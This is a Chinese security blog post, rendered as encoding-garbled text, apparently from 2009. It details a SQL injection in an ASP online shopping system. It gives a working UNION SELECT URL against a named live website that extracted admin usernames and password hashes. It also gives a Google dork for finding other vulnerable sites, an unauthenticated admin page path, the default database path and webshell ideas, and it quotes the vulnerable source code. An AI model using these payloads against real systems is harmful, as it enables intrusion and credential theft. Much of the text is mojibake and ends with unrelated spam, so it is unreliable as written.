Çàº£ÍøÕ¾½¨Éè¡¢ÍøÂçÍÆ¹ã×îºÃµÄ¹«Ë¾--ÄúÉí±ßµÄÍøÕ¾½¨Éèר¼Ò,ÂíÉÏÄÃÆðµç»°£¬ÁªÏµÎÒÃÇ£º0971-8235355   
ÇຣÎ÷ÄþÍøÕ¾½¨Éè¡¢ÍøÕ¾ÖÆ×÷¹«Ë¾-Î÷ÄþÍþÊÆµç×ÓÐÅÏ¢·þÎñÓÐÏÞ¹«Ë¾ Ê×Ò³ |  ¹«Ë¾¼ò½é |  ÍøÕ¾½¨Éè |  ÍøÂçÍÆ¹ã |  ¿Õ¼ä×âÓà|  ÓòÃû×¢²á |  ÆóÒµÓʾ֠|  ÍøÂ簲ȫ |  ÍøÕ¾±à³Ì |  ¿Í·þÖÐÐÄ |  ÁªÏµÎÒÃÇ |  È˲ÅÕÐÆ¸
 
Î÷ÄþÍþÊÆ×îÐÂÍøÕ¾ÖÆ×ö°¸Àýչʾ
Lastest Project
 
Î÷ÄþÍøÕ¾½¨Éè  
µ±Ç°Î»ÖÃΪ£ºÊ×Ò³ >> ½Å±¾°²È« >> ÕýÎÄ  
[Ô­´´]ÍøÈ¤ÍøÉϹºÎïϵͳʱÉаæ V×îЩ¶´ÄÃWEBSHELL

ÎÄÕÂÀ´Ô´£º Î÷ÄþÍþÊÆµç×ÓÐÅÏ¢·þÎñÓÐÏÞ¹«Ë¾     ·¢²¼Ê±¼ä£º2009-11-7    ä¯ÀÀ´ÎÊý£º17730    tags£ºÍøÈ¤ ©¶´

ÍøÈ¤ÍøÉϹºÎïϵͳʱÉаæ V×îР

   ½ñÌìÖÜÄ©£¬Ë¯µ½ÖÐÎç²ÅÆð´²£¬¸ÕÉÏÏߣ¬¿´µ½QQºÃÓÑ·øÉäÓã¸øÎÒÁôÑÔ£¬ÕÒÎÒ²âÊԽű¾Â©¶´¡£

·øÉäÓã 13:01:03
µÈÎÒÕÒ¸öµã. 
·øÉäÓã 13:03:48
http://www.lublus.com/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww) 
·øÉäÓã 13:04:41
 ±ícnhww.Ϊɶ²»Ö§³Ö order by 
·øÉäÓã 13:05:06
http://www.lublus.com/price.asp?anid=62%20order%20by%201 
·øÉäÓã 13:05:29
password/admin 

    ËæºóÎÒÊÖ¶¯²âÊÔÁ˼¸Ï£¬·¢ÏÖ©¶´È·Êµ´æÔÚ£¬ÎÒ¸úËûÒªÁËÔ´ÂëºÍÊý¾Ý¿â£¬¿´ÍêÒÔºóÀí½âÆðÀ´¾Í²»ÊǺÜÄÑÁË£¬ÒòΪԴÂëÊÇÕâÑùдµÄ£º

price.asp

rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

×Ô¼º¹¹ÔìÓï¾ä£º

http://www.lublus.com/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

Ö®ºó³É¹¦±©³öÓû§ÃûºÍÃÜÂë¡£

ÉÌÆ·ÐòºÅ ÉÌÆ·Ãû³Æ »áÔ±¼Û µ±Ç°¿â´æ ¹æ¸ñ ¹æ¸ñ²ÎÊý
weih**cheye 15 7a57a5a7438**aac 36 23 ²é¿´Ïêϸ
wei**cheye 15 b2ea44b2cf0**bdb 36 23 ²é¿´Ïêϸ
¾•**˜I 15 88121ef9c5a**5f9 36 23 ²é¿´Ïêϸ

   ÉÏÃæÐÅÏ¢ÒòΪ°üº¬Ãô¸ÐÐÅÏ¢£¬ËùÒÔÂíÈü¿ËÁËһϣ¬ÓÃ*´úÌæÁ˲¿·Ý£¬ÒòΪÊǰïæ²âÊÔ£¬ËùÒÔµ½´Ë´¦ºóÎҾ͸æÒ»¶ÎÂ䣬֮ºó·øÉäÓãÓÖ½«´Ë¹ý³Ì×ܽáÁËһϣ¬Ð´ÁËһƪÎÄÕ£¬ÎÒÖ±½ÓÌùÉÏÀ´£¬ÓÐÐËȤµÄ×Ô¼ºÑо¿°É£¡

ÍøÈ¤ÍøÉϹºÎïϵͳʱÉаæ V×îÐÂ

Ô´ÂëÎÒ´óÖ¿´ÁËÏÂ.ǰ̨һ°ã²»´æÔÚʲôעÈë.Êý¾Ý¿âµÄĬÈϺó´®Îª.asp£¬¿ÉÒÔ¿¼ÂÇÔÚǰ̨ע²áÓû§Óû§¸øÊý¾Ý¿âÀïÃæ²åÂí.

ÎÒµÄ˼·:.

 

1.       ·ÖÎöÔ´Âë.

2.       Êý¾Ý¿âÖвåÂí.

3.       ѰÕÒÉÏ´«Ö®ÀàµÄÎļþ·ÖÎö.

4.       ºǫ́µÄÀûÓ÷ÖÎö.

 

¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­

 

±¾µØ¼ÜÉè¸öiis.²âÊÔÏ¿´¿´.

 

 

ÎÒÃÇËæ±ãÌá½»¸öid ¡®¿´¿´´æÔÚ²»´æÔÚ×¢Èë.

 

Ìá½»ID=XXX¡®·µ»ØÖ÷Ò³.

 

Products.asp

 

<html>

<head>

<!--#include file="conn.asp"-->

<!--#include file="config.asp"-->

<!--#include file="./alipay_inc/myAlipay.asp"-->

<!--#include file="./alipay_inc/alipay_Config.asp"-->

<title><%=webname%>--ÉÌÆ·ÏêϸÐÅÏ¢</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<meta name="description" content="ÍøÈ¤ÍøÉϹºÎïϵͳ,ÍøÈ¤ÍøÉϹºÎïϵͳʱÉаæ,ÍøÈ¤¹ºÎïϵͳ,ÍøÉϹºÎïϵͳ,¹ºÎïϵͳ,ÍøÈ¤¹ºÎï,É̳ÇÔ´Âë,ÍøÉÏÉ̵ê,ÍøÉÏÉ̵êϵͳ,ÓòÃû×¢²á,ÐéÄâÖ÷»ú,ºãÎ°ÍøÂç">

<meta name="keywords" content="ÍøÈ¤ÍøÉϹºÎïϵͳ,ÍøÈ¤ÍøÉϹºÎïϵͳʱÉаæ,ÍøÈ¤¹ºÎïϵͳ,ÍøÉϹºÎïϵͳ,¹ºÎïϵͳ,ÍøÈ¤¹ºÎï,É̳ÇÔ´Âë,ÍøÉÏÉ̵ê,ÍøÉÏÉ̵êϵͳ,ÓòÃû×¢²á,ÐéÄâÖ÷»ú,ºãÎ°ÍøÂç">

 

<link href="images/css.css" rel="stylesheet" type="text/css">

</head>

<script language="JavaScript">

       <!--

       function OpenNews()

       {

                     window.name = "news"

                     win = window.open('','newswin','left=110,width=600,height=420,scrollbars=1');

       }

       //-->

       </script>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" >

<%if IsNumeric(request.QueryString("id"))=False then

response.write("<script>alert(""·Ç·¨·ÃÎÊ!"");location.href=""index.asp"";</script>")

response.end

end if

dim id

id=request.QueryString("id")

if not isinteger(id) then

response.write"<script>alert(""·Ç·¨·ÃÎÊ!"");location.href=""index.asp"";</script>"

end if%>

<%dim bookid,action

bookid=request.QueryString("id")

action=request.QueryString("action")

if action="save" then

set rs=server.CreateObject("adodb.recordset")

rs.open "select * from review",conn,1,3

rs.addnew

rs("bookid")=bookid

rs("pingji")=request("pingji")

rs("pinglunname")=HTMLEncode2(trim(request("pinglunname")))

rs("pingluntitle")=HTMLEncode2(trim(request("pingluntitle")))

rs("pingluncontent")=HTMLEncode2(trim(request("pingluncontent")))

rs("ip")=Request.servervariables("REMOTE_ADDR")

rs("pinglundate")=now()

rs("shenhe")=0

rs.update

rs.close

set rs=nothing

set rs=server.CreateObject("adodb.recordset")

rs.open "select * from products where bookid="&bookid,conn,1,3

rs("pingji")=rs("pingji")+1

rs("pingjizong")=rs("pingjizong")+request("pingji")

rs.update

rs.close

set rs=nothing

response.Write "<script language=javascript>alert('ÄúµÄÆÀÂÛÒѳɹ¦Ìá½»,´ý¹ÜÀíÔ±ÉóºË£¡');history.go(-1);</script>"

response.End

end if

%>

ÓзÀ×¢Èë.

¶¼ÊÇsessionÑéÖ¤£¬Ã»ÓÐcookieÕâÌõ·×ÓÎÒÒ²²âÊÔÁË.²»ÐÐ

 

¼ÌÐø¿´´úÂë.

 

Price.asp

 

<!--#include file="conn.asp"-->

<!--#include file="config.asp"-->

<html>

<head>

 

<title><%=webname%></title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<meta name="description" content="<%=des%>">

<meta name="keywords" content="<%=keya%>">

¡­¡­¡­¡­Ê¡ÂÔ

 

nd if

set rs=server.CreateObject("adodb.recordset")

if anid<>"" then

rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

else

select case selectm

case ""

rs.open "select * from products order by adddate desc",conn,1,1

case "0"

rs.open "select * from products order by adddate desc",conn,1,1

case "shopid"

 

 

end select

end if

if err.number<>0 then

response.write "ÔÝÎÞÏà¹ØÊý¾Ý£¡"

end if

if rs.eof And rs.bof then

Response.Write "<p align='center'>ÔÝÎÞÏà¹ØÊý¾Ý£¡</p>"

else

totalPut=rs.recordcount

if currentpage<1 then

currentpage=1

end if

if (currentpage-1)*MaxPerPage>totalput then

if (totalPut mod MaxPerPage)=0 then

currentpage= totalPut \ MaxPerPage

else

currentpage= totalPut \ MaxPerPage + 1

end if

end if

if currentPage=1 then

showContent

showpage totalput,MaxPerPage,"Price.asp"

else

if (currentPage-1)*MaxPerPage<totalPut then

rs.move  (currentPage-1)*MaxPerPage

dim shopmark

shopmark=rs.bookmark

showContent

showpage totalput,MaxPerPage,"Price.asp"

else

currentPage=1

showContent

showpage totalput,MaxPerPage,"Price.asp"

end if

end if

end if

sub showContent

dim i

i=0

%>

ûÓзÀ¹ýÂË.

Price.asp?anid=62£»£¨Ìá½»²éѯÓï¾ä£©--

/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

 

 

/admin/admin.asp

/admin/admin3.asp

 

<html><head><title>É̳ǹÜÀíϵͳ</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<link href="../images/css.css" rel="stylesheet" type="text/css">

</head>

<body>

<%

 

Dim theInstalledObjects(24)

ûÓÐÑéÖ¤¿ÉÒÔÖ±½Ó·ÃÎÊ.

 

 

 

2.Êý¾Ý¿â.

 

\cnhwwdata\cnhww.asp ĬÈϵÄÊý¾Ý¿â·¾¶.

 

˼·: Èç¹ûÊý¾Ý¿â·¾¶Ã»Ð޸ģ¬¿ÉÒÔ¿¼ÂÇÔÚǰ̨ע²áÓû§ÄÃshell.

 

 

 

<%nodown%> ·ÀÏÂÔØ±í¶Î.

 

Cnhww ºǫ́Óû§±í¶Î.

 

User ǰ̨Óû§±í¶Î.

 

ÕâÀï²»ÓÃ˵Á˰É.·ÀÏÂÔØ±í¶ÎÔڲ嵽Êý¾Ý¿âµÄµÚÒ»¸öÐÐ.Êý¾Ý¿â²åÂíÕâÌõ·×ӾͲ»×ßÁË.(ǰ̨²åÈëÒ»¾ä»°Ò²²»»á±ÕºÏ)

 

 

1.       ºǫ́ÄÃshell.

 

ûÓзÀ¹ýÂË.

Price.asp?anid=62£»£¨Ìá½»²éѯÓï¾ä£©--

 

 

Óï¾ä¾Í²»¹¹ÔìÁË.

²éѯCnhww ±íÀïÃæµÄ

Admin /password

ºǫ́ÄÃshellµÄ·½·¨

 

ÍøÈ¤ÍøÉϹºÎïϵͳʱÉаæ

¹Ø¼ü×Ö

inurl:Price.asp?anid=

ÀûÓ÷½·¨

/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

Äõ½¹Ù·½ÍøÕ¾È¥²âÊÔ£¬½á¹û·¢ÏÖÓÃÁËͨÓ÷À×¢Èë

ÒÔÏÂÊÇÒýÓÃÆ¬¶Î£º
·Ç·¨²Ù×÷£¡ÏµÍ³×öÁËÈçϼǼ¡ý
²Ù×÷£É£Ð£º123.45.67.89

²Ù×÷ʱ¼ä£º2009-11-7 15:31:35
²Ù×÷Ò³Ãæ£º/fshop/products.asp
Ìá½»·½Ê½£º£Ç£Å£Ô
Ìá½»²ÎÊý£ºid
Ìá½»Êý¾Ý£º346 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from cnhww order by adddate desc

·øÉäÓã½Ó×ŲâÊÔ£¬·¢ÏÖ£¬¹Ù·½½«ºǫ́ɾ³ýÁË£¬²¢ÇÒÊý¾Ý¿â±íÃûÒ²¸ÄÁË£¬¹þ¹þ£¬ÎҾͲ»½Ó×ÅÍæÁË¡£


ÉÏһƪ£º[Ô­´´]HIÔÚÏ߿ͷþµÄÒ»¸ö©¶´
ÏÂһƪ£º±¾ÈËNÄêǰдµÄÎÄÕ£¬×¢ÈëÓ°×ÓÓ¥
ÆÀÂÛÁбí
ÕýÔÚ¼ÓÔØÆÀÂÛ¡­¡­
¡¡¡¡
ÆÀÂÛ ¡¡¡¡
ÄØ  ³Æ£º
ÑéÖ¤Â룺 Èô¿´²»ÇåÇëµã»÷¸ü»»£¡
ÄÚ  ÈÝ£º
 
 
  ÔÚÏßǢ̸×Éѯ£º
µã»÷ÕâÀï,ÔÚÏßǢ̸   µã»÷ÕâÀï,ÔÚÏßǢ̸   µã»÷ÕâÀï,ÔÚÏßǢ̸
ÓëÎÒ½»Ì¸  ÓëÎÒ½»Ì¸ ÓëÎÒ½»Ì¸
³Ë³µÂ·Ïß    »ã¿î·½Ê½   ¼ÓÃ˺Ï×÷  È˲ÅÕÐÆ¸  
¹«Ë¾µØÖ·£ºÇຣʡÎ÷ÄþÊÐÎ÷¹Ø´ó½Ö73ºÅ£¨Èý¶þËIJ¿¶ÓÕÐÐÐËùËÄÂ¥£©     ÇàICP±¸13000578ºÅ-1 ¹«°²»ú¹Ø±¸°¸ºÅ:63010402000123    
QQ:147399120    mail:lostlove000@163.com    µç»°: 13897410341    Óʱࣺ810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    °æÈ¨ËùÓУºÎ÷ÄþÍþÊÆµç×ÓÐÅÏ¢·þÎñÓÐÏÞ¹«Ë¾ δ¾­ÊéÃæÖÆÊÚȨ£¬ÇëÎðËæÒâ×ªÔØ£¡
ÒµÎñ£ºÇàº£ÍøÕ¾ÖÆ×ö¡¢Çàº£ÍøÕ¾½¨Éè¡¢Çàº£ÍøÒ³Éè¼Æ¡¢Î÷ÄþÍøÕ¾ÖÆ×ö¡¢Î÷ÄþÍøÕ¾½¨Éè¡¢ÇຣÓòÃû×¢²á¡¢Çàº£ÍøÂçÍÆ¹ã¡¢Çàº£ÍøÕ¾ÍÆ¹ã¡¢Çຣ¿Õ¼ä×âÓá¢ÇຣÈí¼þ¿ª·¢¡¢ÍøÕ¾°²È«¡¢ÍøÂ簲ȫ

Ò»±¾´óµÀÏã½¶ÖÐÎÄÔÚÏßÊÓÆµ_¹ú²úÔÚÏß¾«Æ·ÑÇÖÞ¶þÇø_¹ú²úÔÚÏß¾«Æ·ÑÇÖÞµÚÒ»ÇøÏã½¶